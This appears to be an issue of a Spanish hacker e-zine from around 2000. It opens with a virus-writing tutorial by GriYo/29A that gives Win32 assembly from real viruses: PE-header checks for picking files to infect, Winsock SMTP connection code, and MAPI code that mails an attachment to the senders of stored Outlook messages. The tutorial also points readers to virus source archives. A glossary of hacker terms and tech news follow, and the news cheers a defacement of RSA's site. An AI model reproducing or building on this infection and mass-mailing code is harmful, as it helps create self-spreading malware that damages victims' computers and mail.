OH_SizeOfUninitializedData DD ?
OH_AddressOfEntryPoint DD BYTE PTR ?
OH_BaseOfCode DD BYTE PTR ?
OH_BaseOfData DD BYTE PTR ?
; NT additional fields:
OH_ImageBase DD BYTE PTR ?
OH_SectionAlignment DD ?
OH_FileAlignment DD ?
OH_MajorOperatingSystemVersion DW ?
OH_MinorOperatingSystemVersion DW ?
OH_MajorImageVersion DW ?
OH_MinorImageVersion DW ?
OH_MajorSubsystemVersion DW ?
OH_MinorSubsystemVersion DW ?
OH_Reserved1 DD ?
OH_SizeOfImage DD ?
OH_SizeOfHeaders DD ?
OH_CheckSum DD ?
OH_Subsystem DW ?
OH_DllCharacteristics DW ?
OH_SizeOfStackReserve DD ?
OH_SizeOfStackCommit DD ?
OH_SizeOfHeapReserve DD ?
OH_SizeOfHeapCommit DD ?
OH_LoaderFlags DD ?
OH_NumberOfRvaAndSizes DD ?
UNION
OH_DataDirectory IMAGE_DATA_DIRECTORY \
IMAGE_NUMBEROF_DIRECTORY_ENTRIES \
DUP (?)
OH_DirectoryEntries IMAGE_DIRECTORY_ENTRIES ?
ENDS
IMAGE_OPTIONAL_HEADER ENDS
IMAGE_SIZEOF_STD_OPTIONAL_HEADER EQU 28d
IMAGE_SIZEOF_NT_OPTIONAL_HEADER EQU SIZE IMAGE_OPTIONAL_HEADER
En el fichero PE.INC ( ver "29A Include files" en el apendice A ) encontraras la declaracion del resto de las
estructuras que componen la cabecera PE. Como ejemplo de como acceder a estas estructuras vemos, a
continuacion, un fragmento del virus Win32.Parvo, en el que el virus chequea algunos campos de la
cabecera PE para comprobar si el ejecutable es apto para el metodo de infeccion utilizado:
;Comprobar que la marca MZ esta presente en la direccion base
;del fichero mapeado en memoria
cld
cmp word ptr [ebx],IMAGE_DOS_SIGNATURE
jne inf_close_file
;Chequear la posicion de la "relocation table"
cmp word ptr [ebx+MZ_lfarlc],0040h
jb inf_close_file
;Ahora nos desplazamos a la cabecera PE y miramos si podemos encontrar
;alli la marca que la identifica
mov esi,dword ptr [ebx+MZ_lfanew]
add esi,ebx
lodsd
cmp eax,IMAGE_NT_SIGNATURE
jne inf_close_file
;Mirar la CPU para la que fue compilado este ejecutable
;permitir solo ejecutables para INTEL i386
cmp word ptr [esi+FH_Machine],IMAGE_FILE_MACHINE_I386
jne inf_close_file
;Un vistazo a las caracteristicas para comprobar que se trata de un
;ejecutable
mov ax,word ptr [esi+FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
jz inf_close_file
;Evitamos infectar DLL's
test ax,IMAGE_FILE_DLL
jnz inf_close_file
;Infectar solo aplicaciones graficas, no de consola
cmp word ptr [esi+ \
IMAGE_SIZEOF_FILE_HEADER+ \
OH_Subsystem],IMAGE_SUBSYSTEM_WINDOWS_GUI
jne inf_close_file
Tiene correo nuevo.
¿ Quien no ha jugado alguna vez a enviar un mail utilizando un cliente de TELNET?. Es bien sencillo,
conectamos al puerto 25 ( SMTP ) del servidor de correo y vamos enviando los comandos necesarios para
construir un mensaje, a saber:
220 mail.servidor.cualquiera SMTP/smap Ready.
helo server.mio
250 (server.mio) pleased to meet you.
mail from: <usuario@server.mio>
250 <usuario@server.mio>... Sender Ok
rcpt to: <destinatario@server.suyo>
250 <destinatario@server.suyo> OK
data
354 Enter mail. end with "." on a line by itself.
from: usuario <usuario@server.mio>
to: destinatario <destinatario@server.suyo>
subject: Este es el asunto
Este es el cuerpo del mensaje
.
250 Mail accepted
quit
221 Closing connection
Pues esto es exactamente lo que un virus tiene que hacer para generar un mensaje de correo electronico.
Con la ayuda de las funciones de WINSOCK.DLL podemos realizar estas operaciones. Implementar un
motor SMTP ( Simple Mail Transfer Protocol ) en ensamblador no es labor sencilla, veamos como ejemplo
un fragmento del virus Win32.Influenza, en el que encontramos un ejemplo de como conectar con el
servidor de mail:
lea eax,dword ptr [ebp+WSA_data] ; Iniciar WINSOCK
push eax ;
push 00000101h ;
call dword ptr [ebp+a_WSAStartup] ;
or eax,eax ; ¿ Error ?
jnz WSA_CleanUp ;
lea eax,dword ptr [ebp+host_name] ; Obtener host a partir de
push eax ; su nombre
call dword ptr [ebp+a_gethostbyname] ;
or eax,eax ; ¿ Error ?
jz WSA_CleanUp ;
cld ;
lea esi,dword ptr [eax+00000008h] ;
lea edi,dword ptr [ebp+SockAddrIn] ;
push edi ;
movsw ;
push 25 ; Puerto SMTP
call dword ptr [ebp+a_htons] ; Convertir byte-order
cld ;
stosw ;
lodsw ;
movzx ecx,ax ;
lodsd ;
mov esi,dword ptr [eax] ;
rep movsb ; Preparar SockAddrIn
push ecx ;
push SOCK_STREAM ; Usar TCP
push AF_INET ; Internet
call dword ptr [ebp+a_socket] ; Creamos el socket
pop edi ;
cmp eax,00000000h ; ¿ Error ?
jl WSA_CleanUp ;
mov dword ptr [ebp+conn_sock],eax ; Guardar descriptor
push SizeOfAddrIn ;
push edi ;
push eax ;
call dword ptr [ebp+a_connect] ; Conectar
cmp eax,0FFFFFFFFh ; ¿ Error ?
je Disconnect ;
La definicion de las estructuras utilizadas en el ejemplo anterior, como WSA_data o SockAddrIn, podemos
encontrarlas en los ficheros de *includes* de nuestro compilador de C favorito... O en el Win32 SDK de
Microsoft, donde aparecen junto a detallada informacion sobre su utilizacion. El único inconveniente es que
tenemos que portar todo a ensamblador, pero tambien se trata de una ventaja, si no prueba a escribir la
misma funcion en C y compara el tama¤o de los ejecutables resultantes.
Una forma de enviar mail, sencilla y eficaz pese a ser un tanto descarada, la encontramos en el siguiente
codigo, que utiliza funciones de MAPI:
;Registrar nuestra sesion MAPI
lea eax,dword ptr [ebp+hMAPISession]
push eax ;lppSession
push 00000000h ;ulReserved
push 00000020h or 00008000h ;flFlags
push 00000000h ;lpszPassword
push 00000000h ;lpszProfileName
push 00000000h ;ulUIParam
call dword ptr [ebp+a_MAPILogon]
or eax,eax
jnz freeMAPI32
;Buscar un mensaje cualquiera dentro de las carpetas de
;Outlook
lea eax,dword ptr [ebp+MessageID]
push eax ;lpszMessageID
push 00000000h ;ulReserved
;MAPI_LONG_MSGID = 00004000h
push 00004000h ;flFlags
push 00000000h ;lpszSeedMessageID
push 00000000h ;lpszMessageType
push 00000000h ;ulUIParam
push dword ptr [ebp+hMAPISession] ;lhSession
call dword ptr [ebp+a_MAPIFindNext]
or eax,eax
jnz logoutMAPI32
;Tomamos el mensaje
lea eax,dword ptr [ebp+MessagePtr]
push eax ;lppMessage
push 00000000h ;ulReserved
;MAPI_ENVELOPE_ONLY = 00000040
;MAPI_PEEK = 00000080h
push 00000080h or 00000040h ;flFlags
lea eax,dword ptr [ebp+MessageID]
push eax ;lpszMessageID
push 00000000h ;ulUIParam
push dword ptr [ebp+hMAPISession] ;lhSession
call dword ptr [ebp+a_MAPIReadMail]
;Construimos un nuevo mensaje utilizando parte de la informacion
;obtenida del mensaje anterior
cld
lea edi,dword ptr [ebp+MapiMessage]
xor eax,eax
stosd ;ulReserved
lea eax,dword ptr [ebp+szSubject]
stosd ;lpszSubject
lea eax,dword ptr [ebp+szNoteText]
stosd ;lpszNoteText
xor eax,eax
stosd ;lpszMessageType
lea eax,dword ptr [ebp+szDate]
stosd ;lpszDate
xor eax,eax
stosd ;lpszConversationID
mov eax,00000002h ;MAPI_RECEIPT_REQUESTED
stosd ;flFlags
lea eax,dword ptr [ebp+MsgFrom]
stosd ;lpOriginator
mov eax,00000001h
stosd ;nRecipCount
lea eax,dword ptr [ebp+MsgTo]
stosd ;lpRecips
mov eax,00000001h
stosd ;nFileCount
lea eax,dword ptr [ebp+MapiFileDesc]
stosd ;lpFiles
;Origen del mensaje
xor eax,eax ;ulReserved
stosd
stosd ;ulRecipClass
lea eax,dword ptr [ebp+szNameFrom]
stosd ;lpszName
lea eax,dword ptr [ebp+szMailFrom]
stosd ;lpszAddress
xor eax,eax
stosd ;ulEIDSize
stosd ;lpEntryID
;Destino del mensaje
stosd ;ulReserved
inc eax ;MAPI_TO
stosd ;ulRecipClass
mov esi,dword ptr [ebp+MessagePtr]
add esi,0000001Ch ;Go to originator
lodsd
lea esi,dword ptr [eax+00000008h]
movsd
movsd
xor eax,eax
stosd ;ulEIDSize
stosd ;lpEntryID
;Indicamos el fichero que queremos incluir junto con el mensaje
stosd ;ulReserved
stosd ;flFlags
mov eax,00000000h
stosd ;nPosition
lea eax,dword ptr [ebp+szFileAttach]
stosd ;lpszPathName
lea eax,dword ptr [ebp+szFileMsg]
stosd ;lpszFileName
xor eax,eax
stosd ;lpFileType
;Y finalmente enviamos el mensaje
push 00000000h
push 00000000h
lea eax,dword ptr [ebp+MapiMessage]
push eax
push 00000000h
push dword ptr [ebp+hMAPISession]
call dword ptr [ebp+a_MAPISendMail]
;Antes de terminar es necesario liberar la memoria que ha quedado
;reservada por MAPI
push dword ptr [ebp+MessagePtr]
call dword ptr [ebp+a_MAPIFreeBuffer]
;Seamos elegantes, despidamonos
logoutMAPI32: push 00000000h
push 00000000h
push 00000000h
push dword ptr [ebp+hMAPISession]
call dword ptr [ebp+a_MAPILogoff]
;Liberamos MAPI32.DLL para terminar
freeMAPI32: push dword ptr [ebp+hMAPI32]
call FreeLibrary
Apendice A: 29A Include files.
Junto con el paquete que acompa¤a a este articulo encontraras los ficheros necesarios para manejar
facilmente en ensamblador las numerosas estructuras y constantes con las que nos encontraremos al
trabajar en Win32. Estos ficheros, una vez incluidos en nuestro codigo fuente, nos facilitaran la vida a la
hora de escribir fuentes mas claros e inteligibles. Su autor, Jacky Qwerty ( del grupo 29A ) ha incluido en
ellos todas las estructuras basicas y constantes que necesitaremos para empezar a trabajar en serio.
INCLUDES.ZIP ( 29A Include files )
Apendice B: Codigo fuente.
Ademas de los ficheros de *includes* de 29A, en el paquete adjunto encontraras el codigo fuente de
algunos virus que he desarrollado para la plataforma Win32. Esta es una lista de los ficheros y su
contenido:
HPS.ZIP ( Virus Win9x.HPS + codigo fuente )
MARBURG.ZIP ( Virus Win9x.Marburg + codigo fuente )
PARVO.ZIP ( Virus Win32.Parvo )
En mi pagina personal podras encontrar informacion detallada sobre el funcionamiento de cada uno de
estos virus, ademas de articulos, tutoriales, noticias y utilidades. La URL es:
BioTech( http://www.geocities.com/Area51/Corridor/2618 )
Por GriYo / 29A
http://www.29A.net
http://www.geocities.com/Area51/Corridor/2618
griyo@akrata.org
(C) 1997-2001 by !Hispahack
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Terminos hackers II
~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Cryptography )Criptograf¡a= Trmino formado a partir del griego kruptos,
[oculto[ ... significa, seg£n el diccionario acadmico, [Arte de escribir con
clave secreta o de un modo enigm tico[ ... Es criptogr fico cualquier
procedimiento que permita a un emisor ocultar el contenido de un mensaje de
modo que s¢lo personas en posesi¢n de determinada clave puedan leerlo, tras
haberlo descifrado.
Cryptology )Criptolog¡a= Es la parte de la Criptograf¡a que tiene por objeto
el descifrado de criptogramas cuando se ignora la clave.
encryption )cifrado, encriptaci¢n= El cifrado es el tratamiento de un conjunto
de datos, contenidos o en un paquete, a fin de impedir que nadie excepto el
destinatario de los mismos pueda leerlos. Hay muchos tipos de cifrado de datos,
que constituyen la base de la seguridad de la red.
Pretty Good Privacy '' PGP )Privacidad Bastante Buena, Privacidad de las
Buenas= Conocido programa de libre distribuci¢n, escrito por Phil
Zimmermann, que impide, mediante tcnicas de criptograf¡a, que ficheros y
mensajes de correo electr¢nico puedan ser le¡dos por otros. Puede tambin
utilizarse para firmar electr¢nicamente un documento o un mensaje,
realizando as¡ la autentificaci¢n del autor.
phracker )fonopirata= Pirata inform tico especializado en utilizar las redes
telef¢nicas para acceder a sistemas ajenos o a menudo solamente para evitar
pagar las facturas telef¢nicas.
cipherpunk )revientaclaves, revientacifrados= Persona especializada en romper
criptogr ficas y superar sistemas de seguridad. No confundir con cyberpunk.
cyberpunk )cibermaldad, cibermarginalidad= Sensibilidad o creencia en que un
grupo de gente fuera del sistema, armado con su propia individualidad y
capacidad tecnol¢gica, puede romper la tendencia de las instituciones
tradicionales de usar la tecnolog¡a para controlar la sociedad.
cyber' )ciber'= Prefijo utilizado ampliamente en la comunidad Internet para
denominar conceptos relacionados con las redes )cibercultura, ciberespacio,
cibernauta, etc.=. Su origen es la palabra griega [cibernao, que significa
pilotar una nave
Daemon )Daemon= Aplicaci¢n UNIX que est alerta permanentemente en un servidor
Intenet para realizar determinadas tareas como, por ejemplo, enviar un mensaje
de correo electr¢nico o servir una p gina web. [Daemon[ es una palabra latina
que significa [esp¡ritu[ )bueno o malo= o [demonio[.
dialup )conexi¢n por l¡nea conmutada= Conexi¢n temporal, en oposici¢n a
conexi¢n dedicada o permanente, establecida entre ordenadores por l¡nea
telef¢nica normal. D¡cese tambin del hecho de marcar un n£mero de telfono
download )bajar, descargar= En Internet proceso de transferir informaci¢n
desde un servidor de informaci¢n al propio ordenador personal.
hoax )bulo, camelo= Trmino utilizado para denominar a rumores falsos,
especialmente sobre virus inexistentes, que se difunden por la red, a veces
con mucho xito causando al final casi tanto da¤o como si se tratase de un
virus real.
key )clave= C¢digo de signos convenidos para la transmisi¢n de mensajes
secretos o privados.
keyword )clave de b£squeda, palabra clave= Conjunto de caracteres que puede
utilizarse para buscar una informaci¢n en un buscador o en un sitio web.
killer app )aplicaci¢n asesina, aplicaci¢n rompedora= Aplicaciones Internet
que han producido los mayores avances de la red a lo largo de sus historia.
A finales de los a¤os ochenta fue el correo electr¢nico¤ a primeros de los
noventa la World Wide Web. _Cu l ser la killer app del cambio de siglo
y de milenio_.
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Noticias
~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Indice.
La version de Domino para Linux recibe buenas criticas.
Tucows lanza una lista de sitios de descarga Linux mas
populares.
AMD exhibe procesador de 1.1 Gigahertz.
"Denial of Service" (D.o.S). RSA Security.
Inprise lanza Gratis su Compilador Borland C++ 5.5 .
Todos contra el WIN2000.
Linuxcare mejora su infraestructura global de soporte.
MontaVista Software introduce un toolkit de desarrollo
cruzado para Linux integrado.
IBM ViaVoice para Linux.
Microsoft lanza Consola de Juegos
LiveMotion el Nuevo Software de Adobe System
IBM lanza software para Administracion de datos
Xerox alianza con Sharp
eBay esta siendo Investigado
Linus Torvalds, Sin permiso
PC de 200 dolares¡¡¡
DoubleClick esta siendo Investidada
Corel solucionara el fallo de seguridad de su Linux
Windows 2000 podria tener 63000 ERRORES
Star Office 5.1
Nuevo procesador "Crusoe".
Kevin Mitnick en Libertad
Se Rompio el esquema de Encriptacion del DVD
El Reloj de la Muerte
La version de Domino para Linux recibe buenas criticas
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Según informaciones recibidas de personas que ya
han instalado la version de Lotus Domino para Linux,
no podian ser mejores noticias para Lotus, una unidad
de IBM.
Domino R5 necesita mejores instrucciones de
instalacion, pero se configura, instala y aprende a
usar muy rapidamente. Domino R5 ofrece una gran
escalabilidad, integridad transaccional de seguridad y
soporte de protocolos mejorados, lo que lo ha
convertido en poco tiempo en una solucion
groupware solida.
Linux continua cogiendo momentum entre
administradores de TI preocupados por el coste, pero
la disponibilidad de aplicaciones basadas en Linux
jugara un papel importante en determinar su
potencial a largo plazo como plataforma viable de
instalacion.
Con el lanzamiento de Domino R5 Server para Linux,
Lotus ofrece la infraestructura de mensajeria y
desarrollo de aplicaciones web que anteriormente
estaba disponible solamente para sistemas operativos
de mayor coste. Debido a que Domino R5 es
compatible con Domino en diferentes plataformas, se
convierte asi en una solucion perfecta para empresas
de IT que tienen en estos momentos Domino o Lotus
Notes para integrar balanceo y redundancia en el
sistema.
Tucows lanza una lista de sitios de descarga Linux mas
populares
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tucows.com, el sitio web de distribucion de software, ha
anunciado que ha comenzado a ofrecer mensualmente un informe
de sitios web de descarga de software para Linux, y que se¤ala
que el sitio mas popular es ftp.linux.tucows.com.
El pasado diciembre, el número total de archivos descargados del
sitio ftp.linux.tucows.com era casi de 1,7 millones para todas las
distribuciones de Linux. Según Tucows, Corel alcanzo el
porcentaje mas elevado de descargas en diciembre, con un 37%.
Red Hat figura en la segunda posicion con un 20%, con Debian
poco despues en tercer lugar con un 11%.
Entre otras empresas con descargas registradas se encuentran
Mandrake (9%), SuSE (7%), Slackware (6%) y Caldera (6%). Los
datos estan relacionados con las nuevas distribuciones y
actualizaciones de software ya existente.
La biblioteca de aplicaciones Tucows Linux tiene mas de 8 mil
titulos y registra 5 millones de paginas vistas al mes. Tucows
tambien dispone de bibliotecas Windows, PDA/Handhelds, BeOS,
Mac, Games y otras que suman mas de 40.000 titulos.
AMD exhibe procesador de 1.1 Gigahertz
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
No paso mucho tiempo luego de la presentacion, por parte de Intel, de un
prototipo de microprocesador con velocidad de 1.5 Ghz, antes de que AMD
hiciera lo suyo con un chip de 1.1 Ghz.
El prototipo, presentado por AMD, incorpora una nueva tecnologia que hace
innecesario contar con una estructura adicional de enfriamiento del
microprocesador. Como es sabido, la temperatura de los chips aumenta de manera
proporcional a la velocidad de la frecuencia de reloj.
En efecto, el nuevo chip de AMD estara basado en una tecnologia denominada
Thunderbird, que reduce a un minimo el uso de ventiladores adicionales u
otros sistemas de enfriamiento.
Según AMD, el Athlon a 1.1 Ghz sera comercializado hacia fines del segundo
trimestre de 2000.
"Denial of Service" (D.o.S). RSA Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Los ataques no dan tregua, ahora le toco a la RSA Security, y como si fuera poco, no
solamente fue atacada una vez sino dos. Esta vez se cambio el estilo de ataque, ya que no fue
como los anteriores que atacaban el servidor mediante la saturacion, el actualmente famoso
"Denial of Service" (D.o.S).
Esta última incursion de los "Hackers" solamente afecto la pagina de esta prestigiosa
institucion de seguridad informatica, se deduce de ello que quizas fue asi por el nivel de
seguridad que deben tener estos últimos que se decidio ese tipo de agresion y no se continuo
con los metodos anteriores.
El metodo esta vez fue modificar el DNS (Domain name server), o Nombre de Servidor de
Dominio, es decir que se modifico la IP asignada al DNS de esa pagina asignandole uno que
llevara a donde estaba la pagina modificada. En el primero de los dos ataques se derivaba al
usuario a una pagina que era una satira de la original de la RSA con frases como por ejemplo:
"RSA Security inc. hackeada. ¡Confienos sus datos! ¡Rece a Ala!" o "Las chicas son
estúpidas y simples".
En la segunda de las embestidas solamente mostraba una pagina que invitaba al usuario a
concurrir a diferentes canales de IRC, generalmente frecuentados por "Hackers". Dejo aqui
un enlace para que observen como lucia el sitio en la primera etapa del ataque sufrido ayer.
Pueden ver la pagina hackeada en la siguiente direccion:
http://www.2600.com/hacked_pages/2000/02/www.rsa.com/
Enjoy!
Inprise lanza Gratis su Compilador Borland C++ 5.5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
El último compilador ANSI C/C++ y sus utilidades de linea de comandos ahora
disponible. Gratis en el Sitio Web de Borland.
Inprise/Borland (Nasdaq:INPR) anuncio la disponiblidad de su último compilador
ANSI C/C++, el Borland® C++ 5.5 Compiler y sus utilidad de linea de comandos,
totalmente gratis para descargar desde su Sitio web. El Borland C++ 5.5 es uno
de los productos de mas alto rendimiendo y que integra tecnologia disponible en
su version comercial C++ Builder soportando el desarrollo de aplicaciones de 32
bit para sistemas Windows.
"En los últimos 11 a¤os millones de programadores han reconocido la velocidad y
calidad de la tecnologia en compiladores Borland C/C++. Comenzando este mes de
febrero, todos los desarrolladores tienen acceso gratuito al último Borland C/C++
para desarrollar aplicaciones de calidad para Windows, Internet, ..." dijo Michael
Swindell, director de producto Inprise/Borland.
El Compilador Borland C++ 5.5 (BCC) esta basado en la tecnologia de Borland C++ Builder,
esta optimizado para 32-bit, que incluye los últimos estandares ANSI/ISO C++ incluyendo
el RTL, el STL framework y soporte plantillas C++.
Puede ampliar informacion en la web:
http://www.borland.com/bcppbuilder/freecompiler/
Todos contra el WIN2000
~~~~~~~~~~~~~~~~~~~~~~~~
Queda poco tiempo para que haga su aparicion en el mercado oficial el mas famoso de los
productos de M0k0$0ft. Aqui les presentamos algunos productos que podrian destronarlo.
Linux
^^^^^
Por ser un sistema de codigo abierto, tiene un ejercito de personas encargadas de desarrollarlo
a traves de Internet, lo cual le significa un saludable y rapido crecimiento. Para algunos
analistas, como ZDNet, es el gran competidor de Win2000, pues esta posicionado en medianas
y peque¤as empresas, mismo nicho de M0k0$0ft y sus
productos NT.
Linux es un sistema operativo valido desde el punto de vista academico, pero que el mercado
exige productos faciles de instalar y configurar.
No obstante, en el mercado mundial de sistemas operativos de servidores de red, Linux ya
tiene el 25 por ciento. Y sigue subiendo :)
Solarix 8
^^^^^^^^^
Es el producto estrella de Sun Microsystems para el mercado de sistemas operativos.
A pesar de que esta nueva version parece olvidarse de la vieja rivalidad con Microsoft para
apuntar a nichos mas altos, como los sistemas mainframe, hace alarde de tener caracteristicas
donde tradicionalmente ha fallado Microsoft, como en la estabilidad.
Sun ha decidido regalarles el sistema a empresas con maquinas de menos de ocho
procesadores y entregarles el codigo fuente a sus usuarios. El objetivo primordial de Solaris 8
es convertirse en el estandar para los sistemas operativos que buscan conectividad web.
Novell Netware
^^^^^^^^^^^^^^
Novell, a pesar de haber perdido una buena porcion de su mercado a manos de los productos
NT, supo sacar ventaja del aparente descuido de Microsoft en los últimos a¤os. Entonces,
lanzo nuevas herramientas y aplicaciones que fueron bien recibidas por la critica especializada
y por sus usuarios.
A pesar de que Windows 2000 'copio' su idea original de los Directorios de Sistema Novell
(NDS, sigla en ingles), una de sus mejores herramientas, Novell tiene a su favor la
compatibilidad con toda clase de programas y aplicaciones.
Sistemas Mainframe
^^^^^^^^^^^^^^^^^^^
Enormes y masivos sistemas operativos, dise¤ados para correr aplicaciones corporativas de
mision critica, como los servicios de reservaciones de las aerolineas.
Cuando la mayoria de analistas los consideraban obsoletos para la administracion de redes,
retornaron impulsados por los grandes volúmenes de informacion y las necesidades
empresariales de estabilidad 'a toda prueba' en sus procesos criticos.
M0k0$0ft espera llegar a este nicho del mercado con una de sus versiones de Windows 2000.
Sigue sonando viejo, komo es ke a tio bill se le ocurren semejantes kosas, si es asi que vaya
desde ahora prendiendo velones a los santos, kisas ellos escuchen sus peticiones ];->
je je je.
Linuxcare mejora su infraestructura global de soporte
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Linuxcare ha anunciado la adicion de nuevos centros de datos en
Nueva York, San Jose, Londres y Hong Kong.
Linuxcare, Inc., empresa reconocida proveedora de servicios
completos para Linux, ha anunciado una mejora importante en su
estrategia centrada en la its Global Support Infrastructure, la
adicion de cuatro nuevos centros de informacion de 24 horas en
Nueva York, San Jose, Londres y Hong Kong.
Con esta adicion de cuatro nuevos centros se aumenta la
presencia global y mejoran las opciones de la empresa de
proporcionar respuestas a las preguntas tecnicas de los usuarios,
permitiendo ofrecer monitorizacion remota y mantenimiento de los
sistemas y redes de los clientes. La infraestructura ademas
permite distribuir software, parches de productos, actualizaciones
y muchos mas a traves de lineas de alta capacidad.
MontaVista Software introduce un toolkit de desarrollo cruzado para Linux integrado
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MontaVista Software Inc., empresa desarrolladora del sistema
operativoHard Hard Hat Linux para aplicaciones integradas, ha
anunciado su nuevo toolkit de desarrollo cruzado Hard Hat Linux
para procesadores PowerPC Motorola.
El creciente equipo de ejecutivos e ingenieros de MontaVista
tiene una experiencia combinada sin precedentes de mas de 100
a¤os en informatica integrada y sistemas operativos.
IBM ViaVoice para Linux
~~~~~~~~~~~~~~~~~~~~~~~
IBM ha anunciado la disponibilidad del Software Developer Kit &
Personal Run Time Engine de ViaVoice para Linux.
IBM es la primera y única empresa que ofrece herramientas y
tecnologia de reconocimiento de voz gratuitas en el sistema
operativo Linux. Disponible desde hoy, IBM ViaVoice Software
Developers Kit (SDK) y Run Time Kits para Linux son los primeros
en una serie de soluciones Linux de IBM que haran mas facil que
los desarrolladores incorporen tecnologia de reconocimiento en
sus aplicaciones de proxima generacion.
IBM cree que la tecnologia de reconocimiento de voz sera el
proximo interfaz de usuario informatico en cualquier plataforma
operativa. Ofreciendo ViaVoice a la comunidad Linux, los
desarrolladores dispondran de las herramientas para crear la
siguiente generacion de interfaces conversacionales basados en
estandares abiertos, mejorando de forma significativa la
interaccion humana con dispositivos informaticos en red y
aplicaciones de comercio electronico.
Microsoft lanza Consola de Juegos
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Pues si, parece ser que Microsoft quiere entrar al campo de los videojuegos, estos perros no se
cansan de manipular y robar a la gente con su fastidioso, asqueroso Software Winbugs y ahora
quieren joder a los pelaos con una consola de juegos...
Para ser que la consola tendra el nombre de X-Box y se lanzara en el 2001.. La consola incluira
un procesador de 600 MHz y un Procesador de graficas en 3-D fabricado por Nvidia.
Ademas sera capaz de reproducir DVD, o videodiscos digitales y de conectarse a la Internet...
LiveMotion el Nuevo Software de Adobe System
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
El Nuevo Programa de Adobe System crea graficos interactivos y animaciones de alto nivel para la
web. El Software permite crear cualquier figura, desde graficos dinamicos individuales hasta
paginas completas con movimiento, sonido e interactividad.
Tiene la capacidad de soportar una gama amplia de formatos graficos, incluyendo gif, jpeg, png,
Adobe Photoshop y Flash...
La version beta esta disponible en el sitio:
http://www.adobe.com/products/livemotion/main.html
Para Administrar datos
~~~~~~~~~~~~~~~~~~~~~~~
IBM introdujo al mercado un nuevo software que ayudara a las empresas a administrar las enormes
cantidades de datos contenidos en documentos, video y audio, almacenados en sus propias redes
ciberneticas y en la internet.
El Software de IBM content Manager, permite llevar a cabo busquedas multiples de programas y
bases de datos, asi como tambien de fotos...
Xerox alianza con Sharp
~~~~~~~~~~~~~~~~~~~~~~~~
Xerox realizo una alianza de dos mil millones de dolares con Sharp y Fuji Xerox, en busca de
ofrecer impresoras mas baratas y con mayor calidad a millones de pequenas oficinas en todo el
mundo...
eBay esta siendo Investigado
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
El Departamento de Justicia de Estados Unidos, decidio investigar a eBay, el mayor servicio de
subastas en linea del mundo, por presuntas practicas de competencia desleal.
Las denuncias se ocacionaron ya que parece ser que eBay bloqueo el acceso a los agentes
(programas que recorren la Web, para cumplir tareas)... eBay No queria que dichos agentes tomaran
informacion sobre precios de su Web y los comparan con otros, para buscar economia.
Linus Torvalds, Sin permiso
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Parece ser que los senores de Gringolandia No le han resuelto el problema a Torvalds de su
ingreso en ese Pais, hace 3 anos que Torvalds esta por esos lados y no le han dado el permiso
para recidir en ese lugar.
Como quien dice Viejo Torvalds esta como de Ilegal, y este es realmente perjudicial para el, pues
no puede solicitar prestamos bancarios, y realizar otras actividades financieras.
PC de 200 dolares¡¡¡
~~~~~~~~~~~~~~~~~~~
Samsung esta desarrollando un computador de solo 200 dolares. Probablemente la makina este basada
en un procesador de Intel llamado Timna.
Con estos precios se acabarian las actualizaciones, ya que seria mejor comprar uno Nuevo...
DoubleClick esta siendo Investidada
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
El Gobierno de Gringolandia esta investigando a DoubleClick, la mayor empresa de publicidad de
Internet. Se le acusa de Violar la privacidad de los usuarios de la Red.
Corel solucionara el fallo de seguridad de su Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
La companía Corel esta trabajando en un parche para su última versian de Linux, con vistas a
solucionar el problema que permite que usuarios no autorizados ganen acceso a las maquinas que
usan el sistema.
Un programa llamado Corel Update (actualizacian de Corel) tiene un problema que consiste en que
permite que un usuario ordinario lleve a cabo acciones que, en principio, estan destinadas solo
al administrador del sistema.
Solucionar este fallo es en estos momentos la principal prioridad de Corel, según ha declarado la
propia companía. Se espera que la companía ponga pronto un parche en la pagina Web.
Corel comenza a vender su Corel Linux en el mes de noviembre. Tambien ha comenzado las pruebas
beta de su suite grafica CorelDraw para Linux.
Windows 2000 podria tener 63000 ERRORES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Como es normal parece ser que el NUEVO S.O de M0cosOft tiene algo de 63000 errores.
Un dia antes del lanzamiento, varios medios especializados reprodujeron un comunicado interno
proveniente de la misma empresa M0coSoft, en el que se advierte sobre la existencia de 63000
errores de fabricacion. Parece ser que el comunicado esta firmado por el lider de programadores
de WinBugs Marc Lucovsky.
Pero saben que fue lo que dijo unos de los directivos de M0CoSoft, que el no desmintia el
comunicado, pero que es una estrategia de motivacion para que los programadores se incentiven en
encontrar fallas en el sistema.
